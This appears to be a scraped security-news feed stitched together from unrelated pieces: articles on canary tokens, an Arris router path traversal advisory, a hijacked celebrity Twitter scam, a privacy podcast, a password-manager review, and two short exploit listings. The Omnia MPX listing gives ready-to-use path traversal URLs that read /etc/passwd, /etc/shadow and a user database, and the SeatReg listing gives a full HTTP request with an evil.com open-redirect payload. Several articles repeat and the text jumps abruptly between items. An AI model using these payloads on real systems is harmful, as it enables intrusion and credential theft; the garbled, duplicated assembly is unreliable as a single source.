Canary tokens — also known as honey tokens — force attackers to second-guess their potential good fortune when they come across user and application secrets.

With nearly half of all breaches involving external attackers enabled by stolen or fake credentials, security firms are pushing a high-fidelity detection mechanism for such intrusions: canary tokens.

Canary tokens, a subset of honey tokens, are manufactured access credentials, API keys, and software secrets that, when used, trigger an alert that someone is attempting to use the fake secret. Because the credentials are not real, they would never be used by legitimate workers, and so any attempt to access a resource using the canary token is a high-confidence sign of a compromise.

Last week, secrets-management firm GitGuardian released a version of the technology, _ggcanary_, as an open source project on GitHub. The project, tailored to Amazon Web Services (AWS) credentials, is designed to give developers a simple-to-use tool to detect attacks on their software development pipeline, says Henri Hubert, lead developer for GitGuardian's Secrets Team.

"You can put them almost everywhere," he says. "The best place to put them is in the CI/CD pipeline or in your artifacts used in that pipeline, such as Docker images. But you can also put them in your private repositories and your local environment. You can put them almost anywhere that is related to your developers' work."

    

Credentials are a popular target of theft. Source: 2022 Data Breach Investigations Report, Verizon

As the use of cloud services and APIs have taken off, attackers have increasingly targeted such infrastructure with stolen credentials and API tokens. The average company uses more than 15,000 APIs, tripling in the past year, while malicious attacks on those APIs have jumped seven-fold, according to research released in April. In addition, nearly 50% of all breaches not otherwise due to user error or misuse make use of credentials, according to Verizon's "2022 Data Breach Investigations Report" (DBIR). 

**Tripwires Slow Down Attacks**

Unsurprisingly, more companies are using canary tokens to create digital minefields for which attackers need to be wary or otherwise get caught. By seeding file servers, development servers, and personal systems with files that contain credentials or links that can act as tripwires, companies make lateral movement within their systems much more hazardous for attackers, says Haroon Meer, founder and CEO of Thinkst, a cybersecurity consultancy that created its own infrastructure for canary devices and tokens, including servers, sensors, and credentials.

Yet, attackers really have no choice: They cannot ignore potential legitimate credentials during an intrusion, he says.

"If they happen to find AWS credentials or the keys to someone's Kubernetes cluster, attackers have to try it — it's really hard for them to not to use those," Meer says. "And if you get notified the moment that they try it, then you shrink the exposure window so dramatically because you are not finding out months later after they have done everything to you."

Thinkst's Meer likes to point to comments from penetration testers and red teams that highlight the utility of canary tokens. Attackers have to always second guess any cache of credentials, API keys, or software secrets that they find, and that slows them down, tweeted Shubham Shah, a bug hunter, penetration tester, and chief technology officer at attack-surface management startup Assetnote.

"The concept and use of canary tokens has made me very hesitant to use credentials gained during an engagement, versus finding alternative means to an end goal," Shah said. "If the aim is to increase the time taken for attackers, canary tokens work well."

GitGuardian's _ggcanary_ focuses on Amazon Web Services because of the popularity of the platform and of the infrastructure-as-code management platform, Terraform. In its best-practices document, Amazon highlights that control of AWS access keys equals control of all AWS resources.

"Anyone who has your access keys has the same level of access to your AWS resources that you do," Amazon stated in its "Best practices for managing AWS access keys" document. "Consequently, AWS goes to significant lengths to protect your access keys, and, in keeping with our shared-responsibility model, you should as well."

**Everyone Likes Canaries**

Companies such as Thinkst, GitGuardian and Microsoft are aiming to make canary tokens much easier to deploy — often in minutes.

Yet defenders are not the only ones to find uses for canaries. Attackers have also started using canary tokens as a way to detect when defenders analyze their malware.

In a recent report of an attack by the Iran-linked group MuddyWater, Cisco's Talos Intelligence group noted the simple usage of canary tokens. The initial malware — a Visual Basic script — sends two requests for the same canary token to validate a compromise. If only a single request is detected, which would likely happen during sandboxed execution or during analysis, then the malware does not run.

"A reasonable timing check on the duration between the token requests and the request to download a payload can indicate automated analysis," stated Cisco's threat intelligence team in an advisory. "Automated sandboxed systems would typically execute the malicious macro generating the token requests."

Credential Canaries Create Minefield for Attackers

A researcher has found a serious vulnerability in the muhttpd webserver that is used in millions of routers and modems. A patch is available but ISPs are often slow to push out firmware updates.
The post Millions of Arris routers are vulnerable to path traversal attacks appeared first on Malwarebytes Labs.

Security researcher Derek Abdine has published an advisory about vulnerabilities that exist in the MIT-licensed muhttpd web server. This web server is present in Arris firmware which can be found in several router models.

**muhttpd web server**

muhttpd (mu HTTP deamon) is a simple but complete web server written in portable ANSI C. It has three major goals: Be simple, be portable, and be secure. Simplicity was the main goal for muhttpd, but because of its simplicity and broad use, it also must prioritize security.

ISP customer premise equipment (CPE) often uses this web server, and ISP subscribers will typically get these routers in loan for telephony and Internet access.

**Path traversal**

A path traversal attack aims to access files and directories stored outside the web root folder. These attacks are sometimes referred to as dot-dot-slash attacks since they manipulate variables that reference files with “dot-dot-slash (../)” sequences and variations of them to access arbitrary files and directories.

The muhttpd server 1.1.5 (last official release 2010) has a path traversal vulnerability. The latest release of muhttpd is version 1.1.7 (released June 1, 2022). Unfortunately the Arris firmware is based on the vulnerable version of muhttpd.

**Vulnerabilities**

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). Derek Abdine found several vulnerabilities, one of which is:

**CVE-2022-31793:** Path traversal from the filesystem root. Simply prepending a single character that is not a dot (“.”), forward slash (“/”) or question mark (“?”) before the requested path is sufficient to obtain any regular file on the device. This vulnerability allows an unauthenticated remote attacker (in cases where remote administration is enabled) or any local (LAN) party to obtain:

*   The contents of the md5crypt (salted/hashed) passwords in _/etc/passwd_.
*   The SSID and plaintext password of the 2G and 5G Wi-Fi networks broadcast by the device.
*   The usernames and (sometimes encrypted) passwords of all administration accounts on the system.
*   Configuration information including the TR-069 protocol in use by an internet service provider (ISP).
*   Session Initiation Protocol (SIP) usernames (phone numbers) and passwords, including SIP endpoint URLs.
*   Port forwarding configuration information.
*   Other sensitive network information, such as established TCP connections.
*   Various system and firewall logs.
*   A complete list of the LAN IP address, hostname, MAC, uptime, and device characteristics such as the operating system and known applications of every device on the LAN.
*   The router serial number.
*   The certificate and private key for the web management portal.
*   Router process information.

**Other vulnerabilities**

The researcher found two more vulnerabilities which are not so easy to exploit:

**NULL pointer dereference**: The muhttpd server receives HTTP requests on a non-blocking socket. Socket connections are accepted and fed to a forked process to execute. When data is received, the server reads in a loop until a sequence of two carriage return/newline characters are received. Processing is then handed off to another method which attempts to parse the request method. Injecting a NULL byte into the request steam will cause the request process (forked from the server process) to segfault. A segmentation fault (aka segfault) is a common condition that causes programs to crash.

**Buffer over-read when defanging URLs:** The muhttpd server contains a buffer over-read when dealing with percent-encoded values. When encountering a percent “%” in the URL, the server attempts to decode the next two characters without checking the bounds. As a result, if the URL consists of “%” with no following characters, the _decode\_url_ function will read past the URL data and into the parts of the request buffer containing the HTTP protocol version string. While not practically exploitable, safeguards should be made to prevent accessing unintended address space.

**Affected devices**

The affected muhttpd server is used in fiber and DSL-based Arris router products (NVG), as well as whitelabel/OEM products by other vendors. Internet Service Providers (ISPs) around the world typically loan these routers out to their collective millions of subscribers. In 2017 for example, experts discovered easily exploitable flaws in Arris modems distributed by AT&T.

Arris router models that were found to be vulnerable are NVG443, NVG599, NVG589, NVG510, as well as ISP-customized variants such as BGW210 and BGW320. Please note that Arris routers SBR-AC1900P 1.0.7-B05, SBR-AC3200P 1.0.7-B05, and SBR-AC1200P 1.0.5-B05 are vulnerable to another vulnerability listed as CVE-2022-26992 which allows attackers to execute arbitrary commands via a crafted request.

Internet searches revealed 19,000 vulnerable routers directly connected to the internet. The owners were informed and most of the devices have been patched by now. Both Arris and muhttpd have issued patched versions but since the firmware is widespread and every ISP manages their own firmware updates independently, it’s likely that this issue will persist for years.

**Mitigation**

At the moment there are no reports of these vulnerabilities being used in the wild, but now that the vulnerabilities are known and proof of concept code is available, it might only be a matter of time until an attack is carried out.

If your router uses a vulnerable version of muhttpd you are advised to disable remote administration since that limits exploitability of the vulnerabilities to LAN attacks. Also, either get a patched version as soon as possible or replace the device.

Millions of Arris routers are vulnerable to path traversal attacks

We take a look at some very peculiar tweets from wrestling legend Mick Foley, who claims to have PS5 consoles for sale.
The post Wrestling star Mick Foley’s Twitter compromised, selling PS5 consoles appeared first on Malwarebytes Labs.

Posted: August 1, 2022 by

One of the biggest wrestling stars around, Mick Foley, had his Twitter account hijacked in an attempt to legitimize a very popular scam. When a well known individual has their social media accounts compromised, disaster looms, as everything from phishing to malware distribution waits in the wings for potential victims.

But this time, we traded messages with the scammer to see what was up.

**The fake Mick Foley PS5 giveaway extravaganza**

At some point in the last 24 hours, Mick Foley lost control of his Twitter account. It’s now playing host to multiple Tweets offering up PS5 giveaways. Well, I _say_ “giveaway.” There is a catch, of the financially shaped variety.

Mick’s Twitter account is selling these PS5 consoles “for retail price,” with the proceeds going directly to charity. Note that there is no word of which charity will be receiving the money. I’ve never known a celebrity wrestler to get involved in charity work of some kind and not explain at length who is benefitting.

Some of the other tweets throw in the promise of “free tickets” to his next show as an incentive to paying up. Every tweet related to these PS5s has the replies turned off, which means people can’t easily question the legitimacy of this offer.

At the very least, you’d think Mick would take some photos of the supposed PS5s sitting in front of him. Did Mick take this picture in one of the many tweets promoting the PS5 sale, for example?

Hold that thought, because here is the same photo being used on a totally unrelated seller listing. An unexpected PS5 sale, replies turned off, and stolen images used for the consoles in question? This isn’t a few red flags, it’s a parade.

**Asking the important questions**

The person running Mick Foley’s account asked would-be buyers to contact him via direct message. I always wanted to hang out with a WWE wrestler, so off I went to see how this scam plays out. I asked how to obtain the PS5, and whoever is running the account seemed oddly reticent to explain where to send my money.

Eventually I was told to organise a Zelle payment for $540 USD through Mick’s definitely-real-and-not-at-all-fictional assistant. Considering Foley has 2 million followers on social media, this has the potential for an awful lot of stolen payments. Scammers targeting verified accounts is a popular tactic, and helps to give their fraudulent activities a sheen of legitimacy.

**Lock it down**

You may not have the social media reach of a WWE superstar, but you can still do your bit for a safer social experience. Here’s what Twitter recommends to keep things secure where your social experience is concerned:

*   Use a strong password that you don’t reuse on other websites.
*   Use two-factor authentication.
*   Require email and phone number to request a reset password link or code.
*   Be cautious of suspicious links and always make sure you’re on twitter.com before you enter your login information.
*   Never give your username and password out to third parties, especially those promising to get you followers, make you money, or verify you.
*   Make sure your computer software, including your browser, is up-to-date with the most recent upgrades and anti-virus software.
*   Check to see if your account has been compromised.

**RELATED ARTICLES**

November 23, 2020 - This week on Lock and Code, we talk to Chris Boyd, lead malware intelligence analyst for Malwarebytes, about charity organizations and online ad tracking.

October 27, 2020 - Ransomware gangs are in the news for donating stolen funds to charitable organisations. Is this a good thing, or will it cause more trouble for the charity than it's worth?

October 30, 2019 - Scammers will stop at nothing—not even a tragic natural disaster—for a chance to cash in. We offer some helpful tips to avoid disaster donation scams.

Wrestling star Mick Foley’s Twitter compromised, selling PS5 consoles

Categories: Scams
Tags: charity

Tags: compromised

Tags: hijack

Tags: security

Tags: twitter

We take a look at some very peculiar tweets from wrestling legend Mick Foley, who claims to have PS5 consoles for sale.



(Read more...)




The post Wrestling star Mick Foley's Twitter compromised, selling PS5 consoles appeared first on Malwarebytes Labs.

Posted: August 1, 2022 by

One of the biggest wrestling stars around, Mick Foley, had his Twitter account hijacked in an attempt to legitimize a very popular scam. When a well known individual has their social media accounts compromised, disaster looms, as everything from phishing to malware distribution waits in the wings for potential victims.

But this time, we traded messages with the scammer to see what was up.

**The fake Mick Foley PS5 giveaway extravaganza**

At some point in the last 24 hours, Mick Foley lost control of his Twitter account. It's now playing host to multiple Tweets offering up PS5 giveaways. Well, I _say_ "giveaway." There is a catch, of the financially shaped variety.

Mick's Twitter account is selling these PS5 consoles "for retail price," with the proceeds going directly to charity. Note that there is no word of which charity will be receiving the money. I've never known a celebrity wrestler to get involved in charity work of some kind and not explain at length who is benefitting.

Some of the other tweets throw in the promise of "free tickets" to his next show as an incentive to paying up. Every tweet related to these PS5s has the replies turned off, which means people can't easily question the legitimacy of this offer.

At the very least, you'd think Mick would take some photos of the supposed PS5s sitting in front of him. Did Mick take this picture in one of the many tweets promoting the PS5 sale, for example?

Hold that thought, because here is the same photo being used on a totally unrelated seller listing. An unexpected PS5 sale, replies turned off, and stolen images used for the consoles in question? This isn't a few red flags, it's a parade.

**Asking the important questions**

The person running Mick Foley's account asked would-be buyers to contact him via direct message. I always wanted to hang out with a WWE wrestler, so off I went to see how this scam plays out. I asked how to obtain the PS5, and whoever is running the account seemed oddly reticent to explain where to send my money.

Eventually I was told to organise a Zelle payment for $540 USD through Mick's definitely-real-and-not-at-all-fictional assistant. Considering Foley has 2 million followers on social media, this has the potential for an awful lot of stolen payments. Scammers targeting verified accounts is a popular tactic, and helps to give their fraudulent activities a sheen of legitimacy.

**Lock it down**

You may not have the social media reach of a WWE superstar, but you can still do your bit for a safer social experience. Here's what Twitter recommends to keep things secure where your social experience is concerned:

*   Use a strong password that you don’t reuse on other websites.
*   Use two-factor authentication.
*   Require email and phone number to request a reset password link or code.
*   Be cautious of suspicious links and always make sure you’re on twitter.com before you enter your login information.
*   Never give your username and password out to third parties, especially those promising to get you followers, make you money, or verify you.
*   Make sure your computer software, including your browser, is up-to-date with the most recent upgrades and anti-virus software.
*   Check to see if your account has been compromised.

**RELATED ARTICLES**

Wrestling star Mick Foley's Twitter compromised, selling PS5 consoles

Categories: Exploits and vulnerabilities
A researcher has found a serious vulnerability in the muhttpd webserver that is used in millions of routers and modems. A patch is available but ISPs are often slow to push out firmware updates.



(Read more...)




The post Millions of Arris routers are vulnerable to path traversal attacks appeared first on Malwarebytes Labs.

This week on Lock and Code, we talk with some of the team behind Malwarebytes Labs about whether we've lost the fight for data privacy. 
The post Have we lost the fight for data privacy? Lock and Code S03E16 appeared first on Malwarebytes Labs.

Posted: August 1, 2022 by

At the end of 2021, Lock and Code invited the folks behind our news-driven cybersecurity and online privacy blog, Malwarebytes Labs, to discuss what upset them most about cybersecurity in the year prior. Today, we’re bringing those same guests back to discuss the other, biggest topic in this space and on this show: Data privacy.

You see, in 2021, a lot has happened.

Most recently, with the US Supreme Court’s decision to remove the national right to choose to have an abortion, individual states have now gained control to ban abortion, which has caused countless individuals to worry about whether their data could be handed over to law enforcement for investigations into alleged criminal activity. Just months prior, we also learned about a mental health nonprofit that had taken the chat messages of at-times suicidal teenagers and then fed those messages to a separate customer support tool that was being sold to corporate customers to raise money for the nonprofit itself. And we learned about how difficult it can be to separate yourself from Google’s all-encompassing, data-tracking empire.

None of this is to mention more recent, separate developments: Facebook finding a way to re-introduce URL tracking, facial recognition cameras being installed in grocery stores, and Google delaying its scheduled plan to remove cookie tracking from Chrome.

Today, on Lock and Code with host David Ruiz, we speak with Malwarebytes Labs editor-in-chief Anna Brading and Malwarebytes Labs writer Mark Stockley to answer one, big question: Have we lost the fight to meaningfully preserve data privacy?

The outlook, according to our guests, is bleak, and that isn’t just because so much of our data is tracked today, but that we currently don’t know whether the data that is tracked today could, sometime in the future, become data that is valuable in entirely new ways—much like how period-tracking data suddenly became far more sensitive following the overturning of Roe v. Wade in the United States.

> That’s a big, big danger with this. That you can’t, you just can’t predict where your data is going to end up in the future, or how it mights be used against you. And the more data that is collected on you, and the more it’s aggregated, the more compounded that danger becomes.
> 
> Mark Stockley, Malwarebytes Labs writer

Tune in to the latest episode of Lock and Code to hear about today’s fight to preserve data privacy, what the future of data privacy could look like, and what our guests are doing today to preserve the data privacy of those around them, even if the forecast looks dim.

This video cannot be displayed because your _Functional Cookies_ are currently disabled.

To enable them, please visit our _privacy policy_ and search for the Cookies section. Select _“Click Here”_ to open the Privacy Preference Center and select _“Functional Cookies”_ in the menu. You can switch the tab back to _“Active”_ or disable by moving the tab to _“Inactive.”_ Click _“Save Settings.”_

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

**RELATED ARTICLES**

March 7, 2022 - The most important and interesting security stories from the last seven days.

February 28, 2022 - This week on Lock and Code, we discuss Crisis Text Line's data-sharing agreement with its for-profit partner, which has upset many people.

Have we lost the fight for data privacy? Lock and Code S03E16

Omnia MPX version 1.5.0+r1 suffers from a path traversal vulnerability.

    # Exploit Title: Omnia MPX 1.5.0+r1 - Path Traversal# Date: 24/7/2022# Exploit Author: Momen Eldawakhly (Cyber Guy)# Vendor Homepage: https://www.telosalliance.com/# Software Link: https://support.telosalliance.com/article/934ixoaz3l-mpx-node-release-notes-and-update-instructions# Version: 1.5.0+r1# Tested on: MacOS# PoC:http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..//etc/passwdhttp://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..//etc/shadowUser Database:http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json

Omnia MPX 1.5.0+r1 Path Traversal

WordPress SeatReg plugin version 1.23.0 suffers from an open redirection vulnerability.

    # Exploit Title: WordPress Plugin ‘SeatReg’  - Unauthenticated OpenRedirect# Date: 01-08-2022# Exploit Author: Mariam Tariq - HunterSherlock# Vendor Homepage: https://wordpress.org/plugins/seatreg/# Version: 1.23.0# Tested on: Firefox# Contact me: mariamtariq404@gmail.com*#Description:*An Open Redirection is a vulnerability when a web application or serveruses an unvalidated user-submitted link to redirect the user to a givenwebsite or page.*#Example of Burp Request *```POST /wp-admin/admin-post.php HTTP/1.1Host: website.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0)Gecko/20100101 Firefox/103.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://website.comContent-Type: application/x-www-form-urlencodedContent-Length: 185Origin: https://website.comConnection: closeCookie: {cookies_here}Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: NavigateSec-Fetch-Site: same-originnew-registration-name=dedeed&action=seatreg_create_submit&seatreg-admin-nonce=11b1308e8a&*_wp_http_referer=https://evil.com<https://evil.com>*&submit=Create+new+registration```*#PoC Image:*https://ibb.co/tCZWH0Hhttps://ibb.co/5kh299z

WordPress SeatReg 1.23.0 Open Redirect

Categories: Podcast
Tags: Data privacy

Tags: facebook

Tags: Google

Tags: lock and code

Tags: lock and code podcast

Tags: malwarebytes labs

Tags: podcast

This week on Lock and Code, we talk with some of the team behind Malwarebytes Labs about whether we've lost the fight for data privacy. 



(Read more...)




The post Have we lost the fight for data privacy? Lock and Code S03E16 appeared first on Malwarebytes Labs.

Posted: August 1, 2022 by

At the end of 2021, Lock and Code invited the folks behind our news-driven cybersecurity and online privacy blog, Malwarebytes Labs, to discuss what upset them most about cybersecurity in the year prior. Today, we're bringing those same guests back to discuss the other, biggest topic in this space and on this show: Data privacy.

You see, in 2021, a lot has happened.

Most recently, with the US Supreme Court's decision to remove the national right to choose to have an abortion, individual states have now gained control to ban abortion, which has caused countless individuals to worry about whether their data could be handed over to law enforcement for investigations into alleged criminal activity. Just months prior, we also learned about a mental health nonprofit that had taken the chat messages of at-times suicidal teenagers and then fed those messages to a separate customer support tool that was being sold to corporate customers to raise money for the nonprofit itself. And we learned about how difficult it can be to separate yourself from Google's all-encompassing, data-tracking empire.

None of this is to mention more recent, separate developments: Facebook finding a way to re-introduce URL tracking, facial recognition cameras being installed in grocery stores, and Google delaying its scheduled plan to remove cookie tracking from Chrome.

Today, on Lock and Code with host David Ruiz, we speak with Malwarebytes Labs editor-in-chief Anna Brading and Malwarebytes Labs writer Mark Stockley to answer one, big question: Have we lost the fight to meaningfully preserve data privacy?

The outlook, according to our guests, is bleak, and that isn't just because so much of our data is tracked today, but that we currently don't know whether the data that is tracked today could, sometime in the future, become data that is valuable in entirely new ways—much like how period-tracking data suddenly became far more sensitive following the overturning of Roe v. Wade in the United States.

> That’s a big, big danger with this. That you can’t, you just can’t predict where your data is going to end up in the future, or how it mights be used against you. And the more data that is collected on you, and the more it’s aggregated, the more compounded that danger becomes.
> 
> Mark Stockley, Malwarebytes Labs writer

Tune in to the latest episode of Lock and Code to hear about today's fight to preserve data privacy, what the future of data privacy could look like, and what our guests are doing today to preserve the data privacy of those around them, even if the forecast looks dim.

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

**RELATED ARTICLES**

Keep your logins locked down with our favorite apps for PC, Mac, Android, iPhone, and web browsers.

Bitwarden offers a paid upgrade account. The cheapest of the bunch, Bitwarden Premium, is $10 per year. That gets you 1 GB of encrypted file storage, two-factor authentication with devices like YubiKey, FIDO U2F, Duo, and a password hygiene and vault health report. Paying also gets you priority customer support.

_After signing up,_ _download the app_ _for Windows, MacOS, Android, iOS, or Linux. There are also browser extensions for_ _Firefox, Chrome, Safari, Edge, Vivaldi, and Brave__._

Best Full-Featured Manager

Courtesy of Dashlane

I first encountered Dashlane several years ago. Back then, it was the same as its competitors with no standout attributes. But recent updates have added several helpful features. One of the best is Site Breach Alerts, something other services have since added as well. Dashlane actively monitors the darker corners of the web, looking for leaked or stolen personal data, and then alerts you if your information has been compromised.

Setup and migration from another password manager is simple, and you’ll use a secret key to encrypt your passwords, much like 1Password’s setup process. In practice, Dashlane is very similar to the others in this list. The company did discontinue its desktop app earlier this year, moving to a web-based user interface, which is a little different than 1Password and Bitwarden. (The desktop apps officially shut down on January 10, 2022.) I primarily use passwords in the web browser anyway, and Dashlane has add-ons for all the major browsers, along with iOS and Android apps. If a desktop app is important to you, it’s something to be aware of. Dashlane offers a 30-day free trial, so you can test it out before committing.

_After signing up,_ _download the app_ _for Android and iOS, and grab the browser extensions for_ _Firefox, Chrome, and Edge__._

Best DIY Option (Self-Hosted)

Courtesy of KeePassXC

Want to retain more control over your data in the cloud? Try using a desktop application like KeePassXC. It stores encrypted versions of all your passwords into an encrypted digital vault that keeps you secure with a master password, a key file, or both. The difference is that instead of a hosted service like 1Password syncing it for you, you sync that database file yourself using a file-syncing service like Dropbox or Edward Snowden’s recommended service, SpiderOak. Once your file is in the cloud, you can access it on any device that has a KeePassXC client.

Why do it yourself? In a word: transparency. Like Bitwarden, KeepassXC is open source, which means its code can be and has been inspected for critical flaws.

_Download the_ _desktop app_ _for Windows, MacOS, or Linux and create your vault. There are also extensions for_ _Firefox__,_ _Edge__, and_ _Chrome__. It does not have official apps for your phone. Instead, the project recommends_ _KeePass2Android_ _or_ _Strongbox for iPhone__._

Another Option

Courtesy of NordPass

NordPass is a relatively new kid on the password manager block, but it comes from a company with significant pedigree. NordVPN is a well-known VPN provider, and the company brings to its password manager much of the ease of use and simplicity that made its VPN offering popular. The installation and setup process is a breeze. There are apps for every major platform (including Linux), browser, and device.

The free version of NordPass is limited to one device, and there’s no syncing available. There is a seven-day free trial of the premium version, which lets you test device syncing. But to get that for good, you’ll have to upgrade to the $36-a-year plan. (Like its VPN service, NordPass accepts payment in cryptocurrencies.)

Tag

#mac